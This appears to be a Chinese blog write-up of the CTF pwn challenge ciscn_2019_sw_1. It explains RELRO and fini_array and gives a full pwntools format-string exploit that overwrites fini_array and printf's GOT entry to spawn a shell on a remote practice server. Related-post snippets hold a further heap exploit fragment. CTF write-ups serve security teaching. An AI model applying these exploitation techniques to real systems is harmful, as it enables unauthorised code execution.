ciscn_2019_sw_1 Writeup

已于 2022-03-05 16:17:20 修改
阅读量491 收藏 1
点赞数 1
文章标签: pwn
于 2021-05-11 21:44:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Calllin/article/details/116671780
版权

前提

  • RELRO防御策略是当RELRO保护:
    • 为NO RELRO的时候,init.arrayfini.arraygot.plt均可读可写
    • 为PARTIAL RELRO的时候,ini.arrayfini.array可读不可写,got.plt可读可写
    • 为FULL RELRO时,init.arrayfini.arraygot.plt均可读不可写。
  • linux程序运行时:
    • 在加载的时候,会依次调用init.array数组中的每一个函数指针
    • 在结束的时候,依次调用fini.array中的每一个函数指针。
  • 当程序出现格式化字符串漏洞,但是至少需要写两次才能完成攻击。
    • 当少于两个输入点时,可以考虑改写fini.array中的函数指针为main函数地址,可以再执行一次main函数。
    • 一般来说,这个数组的长度为1,也就是说只能写一个地址。[1]

程序逻辑

  • 设置了数组存储上限char format[68];且输入限制为__isoc99_scanf("%64s", format);
    • 不存在越界输入。
    • 输入的字符串只有64个字符。
  • 存在输入字符串直接输出的情况printf(format);。可能存在格式化字符漏洞。
  • 存在函数_sys,返回了return system(command);

思路

  • .fini_array覆盖为main,使得程序结束后可以再次重新启用。
  • printf_got覆盖为system_plt,使得第二次使用本程序中,跳转到printf()这一步时等效于执行system()。输入的参数即为system()的参数。
  • 几个地址:
    • system().plt = 0x080483D0
    • fini_array = 0x0804979C
    • printf.got = 0x0804989C
    • main() = 0x08048534
from pwn import *
context.log_level = "debug"

io = remote("node3.buuoj.cn",28414)
elf = ELF("./sw_1_ciscn_2019")

fini_array = 0x0804979C
printf_got = 0x0804989C

payload = p32(fini_array+2) + p32(printf_got+2) 
payload += p32(printf_got) + p32(fini_array)
payload += "%"+str(0x0804-0x10)+"c" + "%4$hn"
payload += "%5$hn"
payload += "%"+str(0x83D0-0x0804)+"c" + "%6$hn"
payload += "%"+str(0x8534-0x83D0)+"c" + "%7$hn"


io.sendlineafter("Welcome to my ctf! What's your name?\n",payload)
io.sendlineafter("Welcome to my ctf! What's your name?\n","/bin/sh\x00")
io.interactive()

[1] 参考自 LynneHuan,ciscn_2019_sw_1 https://www.cnblogs.com/LynneHuan/p/14660529.html

Ch4mpa9ne
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
全国大学生信息安全竞赛(CISCN)-reverse-复现(部分)
ookami6497的博客
06-06 1021
CISCN
ciscn_sshop:参赛所用的sshop平台
05-10
2018ciscn sshop 2018ciscn半决赛已经结束了,就把题目放出来好了 ...writeup 详细的 docker环境 环境都在deploy里面了,可以直接运行部署即可 总结 第一次出题也收获了蛮多,以前也没自己出过题目 而且这次走运
ciscn_2019_sw_1
doudoudedi
04-16 591
思路 通过格式化字符串是程序无限循环(__do_global_dtors_aux_fini_array_entry内存的地址写成main函数地址) 我们是通过libc_start_main调用main函数不管是在man函数调用前后都会调用fini函数的指针所以只要将其写坏即可然后将print_got表写成system即可拿到shell exp: from pwn import * #p=proce...
BUUCTF之“ciscn_2019_sw_1”
Probeginner的博客
12-26 686
通过fmt改fini_array为main,更加深入理解程序执行
[BUUCTF-pwn]——ciscn_2019_sw_1
Y_peak的博客
04-03 481
[BUUCTF-pwn]——ciscn_2019_sw_1 一个简单的格式化字符串, 相信大家看到旁边 的system和格式化字符串漏洞,想的一定是利用格式化字符串漏洞将printf_got表修改system_plt表,然后使其循环调用main第二次输入’/bin/sh’就好 可能唯一需要说一下的就是, 程序结束时会调用_fini_array指向的函数指针,所以我们将其修改为mian就会循环调用了 算下偏移, 一看就是4 exploit from pwn import * p = remote("no
ADS Writeup_1_ads_
09-29
《高级数据结构解析1》(ADS Writeup_1)是一篇深入探讨高级数据结构的分析报告,主要聚焦于这些结构在计算机科学中的重要性、应用以及优化策略。数据结构是编程和算法设计的基础,它影响着程序的效率、可读性和可...
ReverseRSA_writeup_rsa_appprivatekey_解密_
09-29
在“writeup_rsa_appprivatekey”中,作者可能详细记录了整个解密过程,包括所采用的策略、遇到的挑战以及最终的解决方案。这样的WriteUp对于学习者来说极其宝贵,因为它不仅展示了理论知识,还提供了实际问题解决的...
ADS Writeup_ads_
10-03
数组允许通过索引来直接访问元素,具有O(1)的访问速度。然而,插入和删除操作可能导致大量元素需要移动,效率较低。 **二、链表** 链表由一系列节点组成,每个节点包含数据和指向下一个节点的引用。与数组相比,...
writeup_knkl_
09-30
1. **技术分析**:文档可能详细解释了"knkl"技术的工作原理、架构或设计思路,包括其优势和限制。 2. **漏洞利用**:如果是安全相关的话题,可能会讨论"knkl"中的安全漏洞,如何发现、利用这些漏洞,以及对应的防御...
ciscn_2019_sw_1(fmt改fini_array无限循环)
wuyvle的博客
04-30 1439
很明显的格式化漏洞,但是printf只能用一次 我们可以修改fini_array 简单地说,在main函数前会调用.init段代码和.init_array段的函数数组中每一个函数指针。同样的,main函数结束后也会调用.fini段代码和.fini._arrary段的函数数组中的每一个函数指针。 而我们的目标就是修改.fini_array数组的第一个元素为start或者main函数地址。需要注意的是,这个数组的内容在再次从start开始执行后又会被修改,且程序可读取的字节数有限,因此需要一次性修改两个地址并且
Ciscn_2019_sw1<fini_array>
最新发布
m0_55906008的博客
09-22 168
​ 在执行main函数之前会调用init_array里的函数,在执行完main函数之后调用fini_array里的函数,因此这道题思路为通过第一次printf劫持printf的got表为system的函数地址,劫持fini_addr为main函数的地址,第二次输入"/bin/sh\x00",当执行到printf(“/bin/sh\x00”)时,由于劫持为system函数,因此执行system(“/bin/sh\x00”),拿到shell。
ciscn_2019_sw_1(fmt劫持fini_array为main,获得一次循环)
m0_51251108的博客
11-13 578
ciscn_2019_sw_1: 主要参考这位师傅:https://www.cnblogs.com/LynneHuan/p/14660529.html#%E7%9F%A5%E8%AF%86%E7%82%B9 先引用下: 当RELRO保护为NO RELRO的时候,init.array、fini.array、got.plt均可读可写; 为PARTIAL RELRO的时候,ini.array、fini.array可读不可写,got.plt可读可写; 为FULL RELRO时,init.array
ciscn_2019_s_1
doudoudedi
06-29 741
思路 通过off by null写key值然后unlink写bss段再次double free写free_hook即可拿到shell exp: from pwn import * #p=process('./ciscn_s_1') p=remote('node3.buuoj.cn',26429) elf=ELF('./ciscn_s_1') libc=elf.libc def add(idx,size,data): p.sendlineafter('show','1') p.sendlineafte
第十六届全国大学生信息安全竞赛创新实践能力赛(CISCN
Welcome To Myon'Blog !
05-27 1875
第十六届全国大学生信息安全竞赛创新实践能力赛(CISCN) Misc 1、被加密的生产流量 Crypto 2、Sign_in_passwd Web 3、unzip 4、dumpit Re 5、babyRE Pwn 6、funcanary
ciscn的简介
weixin_33840661的博客
03-31 1271
www.ciscn.cn 全国大学生信息安全竞赛官网教育部按照《教育部关于进一步加强信息安全学科、专业建设和人才培养工作的意见》(教高〔2005〕7号)的要求及《教育部关于成立2006-2010年教育部高等学校有关科类教学指导委员会的通知》(教高函〔2005〕25号)的有关工作安排,为加强教育部对高等学校信息安全人才培养工作的宏观指导与管理,充分发挥专家学者对信息安全...
ciscn login
m0_64195960的博客
03-20 967
这是去年国赛一道签到题 当时没做出来 现在来复现一下。
2017ciscn
Xi4or0uji
08-04 1370
misc warmup 这题是盲水印加密,拿到一个加密的压缩包和一张png图片,png加密成zip包,然后明文攻击原来的压缩包(时间贼久,等了一个晚上才把压缩包解密了.......... 看到两张差不多的图 丢去stegsolve XOR一下可以看见一堆横纹,然后应该就是盲水印了 最后就是放去解密 python bwm.py encode fuli.png fuli2.png re...
ciscn 2022 华中赛区 misc
wha1e的博客
07-28 541
ciscn 2022 华中赛区 misc
php upload ctf,强网杯CTF防御赛ez_upload Writeup
05-14
首先,我们需要分析题目所提供的代码: ... error_reporting(0); if ($_FILES["upload"]["error"] > 0) { echo "Error: " . $_FILES["upload"]["error"] .... echo "Upload: " .... echo "Type: " .... echo "Size: " ....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值